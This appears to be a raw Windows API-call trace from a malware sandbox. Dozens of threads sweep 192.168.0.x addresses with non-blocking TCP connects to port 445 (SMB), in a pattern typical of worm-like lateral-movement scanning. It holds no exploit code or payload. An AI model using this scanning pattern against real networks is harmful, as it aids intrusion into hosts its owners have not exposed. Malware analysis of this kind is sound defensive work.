[0097.351] ioctlsocket (in: s=0x818, cmd=-2147195266, argp=0x7a7ff44 | out: argp=0x7a7ff44) returned 0 [0097.351] connect (s=0x818, name=0x7a7ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.207"), namelen=16) returned -1 [0097.351] WSAGetLastError () returned 10035 [0097.351] select (nfds=0, readfds=0x0, writefds=0x7a7fd18, exceptfds=0x7a7fe20, timeout=0x7a7ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 79 os_tid = 0xd5c [0097.296] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac138 [0097.296] free (_Block=0x20ac138) [0097.296] inet_addr (cp="192.168.0.206") returned 0xce00a8c0 [0097.296] htons (hostshort=0x1bd) returned 0xbd01 [0097.296] socket (af=2, type=1, protocol=6) returned 0x81c [0097.351] ioctlsocket (in: s=0x81c, cmd=-2147195266, argp=0x7bbff44 | out: argp=0x7bbff44) returned 0 [0097.352] connect (s=0x81c, name=0x7bbff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.206"), namelen=16) returned -1 [0097.352] WSAGetLastError () returned 10035 [0097.352] select (nfds=0, readfds=0x0, writefds=0x7bbfd18, exceptfds=0x7bbfe20, timeout=0x7bbff3c*(tv_sec=10, tv_usec=0)) Thread: id = 80 os_tid = 0xd58 [0097.297] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac110 [0097.297] free (_Block=0x20ac110) [0097.297] inet_addr (cp="192.168.0.205") returned 0xcd00a8c0 [0097.297] htons (hostshort=0x1bd) returned 0xbd01 [0097.297] socket (af=2, type=1, protocol=6) returned 0x820 [0097.352] ioctlsocket (in: s=0x820, cmd=-2147195266, argp=0x7cfff44 | out: argp=0x7cfff44) returned 0 [0097.352] connect (s=0x820, name=0x7cfff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.205"), namelen=16) returned -1 [0097.353] WSAGetLastError () returned 10035 [0097.353] select (nfds=0, readfds=0x0, writefds=0x7cffd18, exceptfds=0x7cffe20, timeout=0x7cfff3c*(tv_sec=10, tv_usec=0)) Thread: id = 81 os_tid = 0xd54 [0097.297] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac0e8 [0097.297] free (_Block=0x20ac0e8) [0097.297] inet_addr (cp="192.168.0.204") returned 0xcc00a8c0 [0097.297] htons (hostshort=0x1bd) returned 0xbd01 [0097.297] socket (af=2, type=1, protocol=6) returned 0x824 [0097.353] ioctlsocket (in: s=0x824, cmd=-2147195266, argp=0x7e3ff44 | out: argp=0x7e3ff44) returned 0 [0097.353] connect (s=0x824, name=0x7e3ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.204"), namelen=16) returned -1 [0097.354] WSAGetLastError () returned 10035 [0097.354] select (nfds=0, readfds=0x0, writefds=0x7e3fd18, exceptfds=0x7e3fe20, timeout=0x7e3ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 82 os_tid = 0xd50 [0097.297] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac0c0 [0097.297] free (_Block=0x20ac0c0) [0097.298] inet_addr (cp="192.168.0.203") returned 0xcb00a8c0 [0097.298] htons (hostshort=0x1bd) returned 0xbd01 [0097.298] socket (af=2, type=1, protocol=6) returned 0x828 [0097.354] ioctlsocket (in: s=0x828, cmd=-2147195266, argp=0x7f7ff44 | out: argp=0x7f7ff44) returned 0 [0097.354] connect (s=0x828, name=0x7f7ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.203"), namelen=16) returned -1 [0097.355] WSAGetLastError () returned 10035 [0097.355] select (nfds=0, readfds=0x0, writefds=0x7f7fd18, exceptfds=0x7f7fe20, timeout=0x7f7ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 83 os_tid = 0xd9c [0097.298] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac098 [0097.298] free (_Block=0x20ac098) [0097.298] inet_addr (cp="192.168.0.202") returned 0xca00a8c0 [0097.298] htons (hostshort=0x1bd) returned 0xbd01 [0097.298] socket (af=2, type=1, protocol=6) returned 0x82c [0097.355] ioctlsocket (in: s=0x82c, cmd=-2147195266, argp=0x80bff44 | out: argp=0x80bff44) returned 0 [0097.355] connect (s=0x82c, name=0x80bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.202"), namelen=16) returned -1 [0097.355] WSAGetLastError () returned 10035 [0097.355] select (nfds=0, readfds=0x0, writefds=0x80bfd18, exceptfds=0x80bfe20, timeout=0x80bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 84 os_tid = 0xda0 [0097.298] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac070 [0097.298] free (_Block=0x20ac070) [0097.298] inet_addr (cp="192.168.0.201") returned 0xc900a8c0 [0097.298] htons (hostshort=0x1bd) returned 0xbd01 [0097.298] socket (af=2, type=1, protocol=6) returned 0x830 [0097.356] ioctlsocket (in: s=0x830, cmd=-2147195266, argp=0x81fff44 | out: argp=0x81fff44) returned 0 [0097.356] connect (s=0x830, name=0x81fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.201"), namelen=16) returned -1 [0097.356] WSAGetLastError () returned 10035 [0097.356] select (nfds=0, readfds=0x0, writefds=0x81ffd18, exceptfds=0x81ffe20, timeout=0x81fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 85 os_tid = 0xda4 [0097.299] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac048 [0097.299] free (_Block=0x20ac048) [0097.299] inet_addr (cp="192.168.0.200") returned 0xc800a8c0 [0097.299] htons (hostshort=0x1bd) returned 0xbd01 [0097.299] socket (af=2, type=1, protocol=6) returned 0x834 [0097.357] ioctlsocket (in: s=0x834, cmd=-2147195266, argp=0x833ff44 | out: argp=0x833ff44) returned 0 [0097.357] connect (s=0x834, name=0x833ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.200"), namelen=16) returned -1 [0097.357] WSAGetLastError () returned 10035 [0097.357] select (nfds=0, readfds=0x0, writefds=0x833fd18, exceptfds=0x833fe20, timeout=0x833ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 86 os_tid = 0x614 [0097.299] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac020 [0097.299] free (_Block=0x20ac020) [0097.299] inet_addr (cp="192.168.0.199") returned 0xc700a8c0 [0097.299] htons (hostshort=0x1bd) returned 0xbd01 [0097.299] socket (af=2, type=1, protocol=6) returned 0x838 [0097.360] ioctlsocket (in: s=0x838, cmd=-2147195266, argp=0x847ff44 | out: argp=0x847ff44) returned 0 [0097.360] connect (s=0x838, name=0x847ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.199"), namelen=16) returned -1 [0097.360] WSAGetLastError () returned 10035 [0097.360] select (nfds=0, readfds=0x0, writefds=0x847fd18, exceptfds=0x847fe20, timeout=0x847ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 87 os_tid = 0x5b0 [0097.299] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abff8 [0097.299] free (_Block=0x20abff8) [0097.299] inet_addr (cp="192.168.0.198") returned 0xc600a8c0 [0097.299] htons (hostshort=0x1bd) returned 0xbd01 [0097.299] socket (af=2, type=1, protocol=6) returned 0x83c [0097.361] ioctlsocket (in: s=0x83c, cmd=-2147195266, argp=0x85bff44 | out: argp=0x85bff44) returned 0 [0097.361] connect (s=0x83c, name=0x85bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.198"), namelen=16) returned -1 [0097.361] WSAGetLastError () returned 10035 [0097.361] select (nfds=0, readfds=0x0, writefds=0x85bfd18, exceptfds=0x85bfe20, timeout=0x85bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 88 os_tid = 0xdb4 [0097.300] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abfd0 [0097.300] free (_Block=0x20abfd0) [0097.300] inet_addr (cp="192.168.0.197") returned 0xc500a8c0 [0097.300] htons (hostshort=0x1bd) returned 0xbd01 [0097.300] socket (af=2, type=1, protocol=6) returned 0x840 [0097.361] ioctlsocket (in: s=0x840, cmd=-2147195266, argp=0x86fff44 | out: argp=0x86fff44) returned 0 [0097.361] connect (s=0x840, name=0x86fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.197"), namelen=16) returned -1 [0097.362] WSAGetLastError () returned 10035 [0097.362] select (nfds=0, readfds=0x0, writefds=0x86ffd18, exceptfds=0x86ffe20, timeout=0x86fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 89 os_tid = 0xdbc [0097.300] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abfa8 [0097.300] free (_Block=0x20abfa8) [0097.300] inet_addr (cp="192.168.0.196") returned 0xc400a8c0 [0097.300] htons (hostshort=0x1bd) returned 0xbd01 [0097.300] socket (af=2, type=1, protocol=6) returned 0x844 [0097.362] ioctlsocket (in: s=0x844, cmd=-2147195266, argp=0x883ff44 | out: argp=0x883ff44) returned 0 [0097.362] connect (s=0x844, name=0x883ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.196"), namelen=16) returned -1 [0097.363] WSAGetLastError () returned 10035 [0097.363] select (nfds=0, readfds=0x0, writefds=0x883fd18, exceptfds=0x883fe20, timeout=0x883ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 90 os_tid = 0xdac [0097.365] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abf80 [0097.365] free (_Block=0x20abf80) [0097.365] inet_addr (cp="192.168.0.195") returned 0xc300a8c0 [0097.365] htons (hostshort=0x1bd) returned 0xbd01 [0097.365] socket (af=2, type=1, protocol=6) returned 0x858 [0097.365] ioctlsocket (in: s=0x858, cmd=-2147195266, argp=0x897ff44 | out: argp=0x897ff44) returned 0 [0097.365] connect (s=0x858, name=0x897ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.195"), namelen=16) returned -1 [0097.366] WSAGetLastError () returned 10035 [0097.366] select (nfds=0, readfds=0x0, writefds=0x897fd18, exceptfds=0x897fe20, timeout=0x897ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 91 os_tid = 0x6e8 [0097.367] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abf30 [0097.367] free (_Block=0x20abf30) [0097.367] inet_addr (cp="192.168.0.194") returned 0xc200a8c0 [0097.367] htons (hostshort=0x1bd) returned 0xbd01 [0097.367] socket (af=2, type=1, protocol=6) returned 0x864 [0097.367] ioctlsocket (in: s=0x864, cmd=-2147195266, argp=0x8abff44 | out: argp=0x8abff44) returned 0 [0097.367] connect (s=0x864, name=0x8abff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.194"), namelen=16) returned -1 [0097.368] WSAGetLastError () returned 10035 [0097.368] select (nfds=0, readfds=0x0, writefds=0x8abfd18, exceptfds=0x8abfe20, timeout=0x8abff3c*(tv_sec=10, tv_usec=0)) Thread: id = 92 os_tid = 0xda8 [0097.368] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abf08 [0097.368] free (_Block=0x20abf08) [0097.368] inet_addr (cp="192.168.0.193") returned 0xc100a8c0 [0097.368] htons (hostshort=0x1bd) returned 0xbd01 [0097.368] socket (af=2, type=1, protocol=6) returned 0x870 [0097.369] ioctlsocket (in: s=0x870, cmd=-2147195266, argp=0x8c4ff44 | out: argp=0x8c4ff44) returned 0 [0097.369] connect (s=0x870, name=0x8c4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.193"), namelen=16) returned -1 [0097.370] WSAGetLastError () returned 10035 [0097.370] select (nfds=0, readfds=0x0, writefds=0x8c4fd18, exceptfds=0x8c4fe20, timeout=0x8c4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 93 os_tid = 0xdb8 [0097.370] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abee0 [0097.370] free (_Block=0x20abee0) [0097.372] inet_addr (cp="192.168.0.192") returned 0xc000a8c0 [0097.372] htons (hostshort=0x1bd) returned 0xbd01 [0097.372] socket (af=2, type=1, protocol=6) returned 0x87c [0097.372] ioctlsocket (in: s=0x87c, cmd=-2147195266, argp=0x8d8ff44 | out: argp=0x8d8ff44) returned 0 [0097.372] connect (s=0x87c, name=0x8d8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.192"), namelen=16) returned -1 [0097.373] WSAGetLastError () returned 10035 [0097.373] select (nfds=0, readfds=0x0, writefds=0x8d8fd18, exceptfds=0x8d8fe20, timeout=0x8d8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 94 os_tid = 0xdb0 [0097.375] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abeb8 [0097.375] free (_Block=0x20abeb8) [0097.375] inet_addr (cp="192.168.0.191") returned 0xbf00a8c0 [0097.375] htons (hostshort=0x1bd) returned 0xbd01 [0097.375] socket (af=2, type=1, protocol=6) returned 0x888 [0097.375] ioctlsocket (in: s=0x888, cmd=-2147195266, argp=0x8ecff44 | out: argp=0x8ecff44) returned 0 [0097.375] connect (s=0x888, name=0x8ecff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.191"), namelen=16) returned -1 [0097.376] WSAGetLastError () returned 10035 [0097.376] select (nfds=0, readfds=0x0, writefds=0x8ecfd18, exceptfds=0x8ecfe20, timeout=0x8ecff3c*(tv_sec=10, tv_usec=0)) Thread: id = 95 os_tid = 0xdf0 [0097.377] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abe90 [0097.377] free (_Block=0x20abe90) [0097.377] inet_addr (cp="192.168.0.190") returned 0xbe00a8c0 [0097.377] htons (hostshort=0x1bd) returned 0xbd01 [0097.377] socket (af=2, type=1, protocol=6) returned 0x894 [0097.378] ioctlsocket (in: s=0x894, cmd=-2147195266, argp=0x900ff44 | out: argp=0x900ff44) returned 0 [0097.378] connect (s=0x894, name=0x900ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.190"), namelen=16) returned -1 [0097.379] WSAGetLastError () returned 10035 [0097.379] select (nfds=0, readfds=0x0, writefds=0x900fd18, exceptfds=0x900fe20, timeout=0x900ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 96 os_tid = 0xe0c [0097.380] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abe68 [0097.380] free (_Block=0x20abe68) [0097.380] inet_addr (cp="192.168.0.189") returned 0xbd00a8c0 [0097.380] htons (hostshort=0x1bd) returned 0xbd01 [0097.380] socket (af=2, type=1, protocol=6) returned 0x8a0 [0097.380] ioctlsocket (in: s=0x8a0, cmd=-2147195266, argp=0x914ff44 | out: argp=0x914ff44) returned 0 [0097.380] connect (s=0x8a0, name=0x914ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.189"), namelen=16) returned -1 [0097.382] WSAGetLastError () returned 10035 [0097.382] select (nfds=0, readfds=0x0, writefds=0x914fd18, exceptfds=0x914fe20, timeout=0x914ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 97 os_tid = 0xe14 [0097.382] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abe40 [0097.382] free (_Block=0x20abe40) [0097.382] inet_addr (cp="192.168.0.188") returned 0xbc00a8c0 [0097.382] htons (hostshort=0x1bd) returned 0xbd01 [0097.382] socket (af=2, type=1, protocol=6) returned 0x8ac [0097.382] ioctlsocket (in: s=0x8ac, cmd=-2147195266, argp=0x928ff44 | out: argp=0x928ff44) returned 0 [0097.382] connect (s=0x8ac, name=0x928ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.188"), namelen=16) returned -1 [0097.383] WSAGetLastError () returned 10035 [0097.383] select (nfds=0, readfds=0x0, writefds=0x928fd18, exceptfds=0x928fe20, timeout=0x928ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 98 os_tid = 0xe10 [0097.383] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abe18 [0097.383] free (_Block=0x20abe18) [0097.383] inet_addr (cp="192.168.0.187") returned 0xbb00a8c0 [0097.383] htons (hostshort=0x1bd) returned 0xbd01 [0097.383] socket (af=2, type=1, protocol=6) returned 0x8b8 [0097.384] ioctlsocket (in: s=0x8b8, cmd=-2147195266, argp=0x93cff44 | out: argp=0x93cff44) returned 0 [0097.384] connect (s=0x8b8, name=0x93cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.187"), namelen=16) returned -1 [0097.384] WSAGetLastError () returned 10035 [0097.384] select (nfds=0, readfds=0x0, writefds=0x93cfd18, exceptfds=0x93cfe20, timeout=0x93cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 99 os_tid = 0xe08 [0097.385] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abdf0 [0097.385] free (_Block=0x20abdf0) [0097.385] inet_addr (cp="192.168.0.186") returned 0xba00a8c0 [0097.385] htons (hostshort=0x1bd) returned 0xbd01 [0097.385] socket (af=2, type=1, protocol=6) returned 0x8c4 [0097.385] ioctlsocket (in: s=0x8c4, cmd=-2147195266, argp=0x950ff44 | out: argp=0x950ff44) returned 0 [0097.385] connect (s=0x8c4, name=0x950ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.186"), namelen=16) returned -1 [0097.386] WSAGetLastError () returned 10035 [0097.386] select (nfds=0, readfds=0x0, writefds=0x950fd18, exceptfds=0x950fe20, timeout=0x950ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 100 os_tid = 0xde8 [0097.386] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abdc8 [0097.386] free (_Block=0x20abdc8) [0097.386] inet_addr (cp="192.168.0.185") returned 0xb900a8c0 [0097.386] htons (hostshort=0x1bd) returned 0xbd01 [0097.386] socket (af=2, type=1, protocol=6) returned 0x8d0 [0097.388] ioctlsocket (in: s=0x8d0, cmd=-2147195266, argp=0x964ff44 | out: argp=0x964ff44) returned 0 [0097.388] connect (s=0x8d0, name=0x964ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.185"), namelen=16) returned -1 [0097.388] WSAGetLastError () returned 10035 [0097.388] select (nfds=0, readfds=0x0, writefds=0x964fd18, exceptfds=0x964fe20, timeout=0x964ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 101 os_tid = 0xe18 [0097.389] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abda0 [0097.389] free (_Block=0x20abda0) [0097.389] inet_addr (cp="192.168.0.184") returned 0xb800a8c0 [0097.389] htons (hostshort=0x1bd) returned 0xbd01 [0097.389] socket (af=2, type=1, protocol=6) returned 0x8dc [0097.389] ioctlsocket (in: s=0x8dc, cmd=-2147195266, argp=0x978ff44 | out: argp=0x978ff44) returned 0 [0097.389] connect (s=0x8dc, name=0x978ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.184"), namelen=16) returned -1 [0097.390] WSAGetLastError () returned 10035 [0097.390] select (nfds=0, readfds=0x0, writefds=0x978fd18, exceptfds=0x978fe20, timeout=0x978ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 102 os_tid = 0xde4 [0097.391] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abd78 [0097.391] free (_Block=0x20abd78) [0097.391] inet_addr (cp="192.168.0.183") returned 0xb700a8c0 [0097.391] htons (hostshort=0x1bd) returned 0xbd01 [0097.391] socket (af=2, type=1, protocol=6) returned 0x8e8 [0097.392] ioctlsocket (in: s=0x8e8, cmd=-2147195266, argp=0x98cff44 | out: argp=0x98cff44) returned 0 [0097.392] connect (s=0x8e8, name=0x98cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.183"), namelen=16) returned -1 [0097.392] WSAGetLastError () returned 10035 [0097.392] select (nfds=0, readfds=0x0, writefds=0x98cfd18, exceptfds=0x98cfe20, timeout=0x98cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 103 os_tid = 0xe04 [0097.393] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abd50 [0097.393] free (_Block=0x20abd50) [0097.393] inet_addr (cp="192.168.0.182") returned 0xb600a8c0 [0097.393] htons (hostshort=0x1bd) returned 0xbd01 [0097.393] socket (af=2, type=1, protocol=6) returned 0x8f4 [0097.393] ioctlsocket (in: s=0x8f4, cmd=-2147195266, argp=0x9a0ff44 | out: argp=0x9a0ff44) returned 0 [0097.393] connect (s=0x8f4, name=0x9a0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.182"), namelen=16) returned -1 [0097.393] WSAGetLastError () returned 10035 [0097.393] select (nfds=0, readfds=0x0, writefds=0x9a0fd18, exceptfds=0x9a0fe20, timeout=0x9a0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 104 os_tid = 0xe20 [0097.394] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abd28 [0097.394] free (_Block=0x20abd28) [0097.394] inet_addr (cp="192.168.0.181") returned 0xb500a8c0 [0097.394] htons (hostshort=0x1bd) returned 0xbd01 [0097.394] socket (af=2, type=1, protocol=6) returned 0x900 [0097.394] ioctlsocket (in: s=0x900, cmd=-2147195266, argp=0x9b4ff44 | out: argp=0x9b4ff44) returned 0 [0097.394] connect (s=0x900, name=0x9b4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.181"), namelen=16) returned -1 [0097.395] WSAGetLastError () returned 10035 [0097.395] select (nfds=0, readfds=0x0, writefds=0x9b4fd18, exceptfds=0x9b4fe20, timeout=0x9b4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 105 os_tid = 0xde0 [0097.395] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abd00 [0097.395] free (_Block=0x20abd00) [0097.395] inet_addr (cp="192.168.0.180") returned 0xb400a8c0 [0097.395] htons (hostshort=0x1bd) returned 0xbd01 [0097.395] socket (af=2, type=1, protocol=6) returned 0x90c [0097.395] ioctlsocket (in: s=0x90c, cmd=-2147195266, argp=0x9c8ff44 | out: argp=0x9c8ff44) returned 0 [0097.396] connect (s=0x90c, name=0x9c8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.180"), namelen=16) returned -1 [0097.396] WSAGetLastError () returned 10035 [0097.396] select (nfds=0, readfds=0x0, writefds=0x9c8fd18, exceptfds=0x9c8fe20, timeout=0x9c8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 106 os_tid = 0xddc [0097.396] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abcd8 [0097.396] free (_Block=0x20abcd8) [0097.396] inet_addr (cp="192.168.0.179") returned 0xb300a8c0 [0097.396] htons (hostshort=0x1bd) returned 0xbd01 [0097.396] socket (af=2, type=1, protocol=6) returned 0x918 [0097.399] ioctlsocket (in: s=0x918, cmd=-2147195266, argp=0x9dcff44 | out: argp=0x9dcff44) returned 0 [0097.399] connect (s=0x918, name=0x9dcff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.179"), namelen=16) returned -1 [0097.400] WSAGetLastError () returned 10035 [0097.400] select (nfds=0, readfds=0x0, writefds=0x9dcfd18, exceptfds=0x9dcfe20, timeout=0x9dcff3c*(tv_sec=10, tv_usec=0)) Thread: id = 107 os_tid = 0xe28 [0097.402] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abcb0 [0097.402] free (_Block=0x20abcb0) [0097.402] inet_addr (cp="192.168.0.178") returned 0xb200a8c0 [0097.402] htons (hostshort=0x1bd) returned 0xbd01 [0097.402] socket (af=2, type=1, protocol=6) returned 0x924 [0097.402] ioctlsocket (in: s=0x924, cmd=-2147195266, argp=0x9f0ff44 | out: argp=0x9f0ff44) returned 0 [0097.402] connect (s=0x924, name=0x9f0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.178"), namelen=16) returned -1 [0097.403] WSAGetLastError () returned 10035 [0097.403] select (nfds=0, readfds=0x0, writefds=0x9f0fd18, exceptfds=0x9f0fe20, timeout=0x9f0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 108 os_tid = 0xe38 [0097.403] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abc88 [0097.403] free (_Block=0x20abc88) [0097.403] inet_addr (cp="192.168.0.177") returned 0xb100a8c0 [0097.403] htons (hostshort=0x1bd) returned 0xbd01 [0097.403] socket (af=2, type=1, protocol=6) returned 0x930 [0097.404] ioctlsocket (in: s=0x930, cmd=-2147195266, argp=0xa04ff44 | out: argp=0xa04ff44) returned 0 [0097.404] connect (s=0x930, name=0xa04ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.177"), namelen=16) returned -1 [0097.406] WSAGetLastError () returned 10035 [0097.406] select (nfds=0, readfds=0x0, writefds=0xa04fd18, exceptfds=0xa04fe20, timeout=0xa04ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 109 os_tid = 0xe2c [0097.406] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abc60 [0097.406] free (_Block=0x20abc60) [0097.406] inet_addr (cp="192.168.0.176") returned 0xb000a8c0 [0097.406] htons (hostshort=0x1bd) returned 0xbd01 [0097.406] socket (af=2, type=1, protocol=6) returned 0x93c [0097.407] ioctlsocket (in: s=0x93c, cmd=-2147195266, argp=0xa18ff44 | out: argp=0xa18ff44) returned 0 [0097.407] connect (s=0x93c, name=0xa18ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.176"), namelen=16) returned -1 [0097.410] WSAGetLastError () returned 10035 [0097.410] select (nfds=0, readfds=0x0, writefds=0xa18fd18, exceptfds=0xa18fe20, timeout=0xa18ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 110 os_tid = 0xe30 [0097.411] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abc38 [0097.411] free (_Block=0x20abc38) [0097.411] inet_addr (cp="192.168.0.175") returned 0xaf00a8c0 [0097.411] htons (hostshort=0x1bd) returned 0xbd01 [0097.411] socket (af=2, type=1, protocol=6) returned 0x948 [0097.411] ioctlsocket (in: s=0x948, cmd=-2147195266, argp=0xa2cff44 | out: argp=0xa2cff44) returned 0 [0097.411] connect (s=0x948, name=0xa2cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.175"), namelen=16) returned -1 [0097.412] WSAGetLastError () returned 10035 [0097.412] select (nfds=0, readfds=0x0, writefds=0xa2cfd18, exceptfds=0xa2cfe20, timeout=0xa2cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 111 os_tid = 0xe00 [0097.412] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abc10 [0097.412] free (_Block=0x20abc10) [0097.412] inet_addr (cp="192.168.0.174") returned 0xae00a8c0 [0097.412] htons (hostshort=0x1bd) returned 0xbd01 [0097.412] socket (af=2, type=1, protocol=6) returned 0x954 [0097.412] ioctlsocket (in: s=0x954, cmd=-2147195266, argp=0xa40ff44 | out: argp=0xa40ff44) returned 0 [0097.413] connect (s=0x954, name=0xa40ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.174"), namelen=16) returned -1 [0097.413] WSAGetLastError () returned 10035 [0097.413] select (nfds=0, readfds=0x0, writefds=0xa40fd18, exceptfds=0xa40fe20, timeout=0xa40ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 112 os_tid = 0xe1c [0097.413] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abbe8 [0097.413] free (_Block=0x20abbe8) [0097.413] inet_addr (cp="192.168.0.173") returned 0xad00a8c0 [0097.413] htons (hostshort=0x1bd) returned 0xbd01 [0097.413] socket (af=2, type=1, protocol=6) returned 0x960 [0097.414] ioctlsocket (in: s=0x960, cmd=-2147195266, argp=0xa54ff44 | out: argp=0xa54ff44) returned 0 [0097.414] connect (s=0x960, name=0xa54ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.173"), namelen=16) returned -1 [0097.415] WSAGetLastError () returned 10035 [0097.415] select (nfds=0, readfds=0x0, writefds=0xa54fd18, exceptfds=0xa54fe20, timeout=0xa54ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 113 os_tid = 0xe24 [0097.415] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abbc0 [0097.415] free (_Block=0x20abbc0) [0097.416] 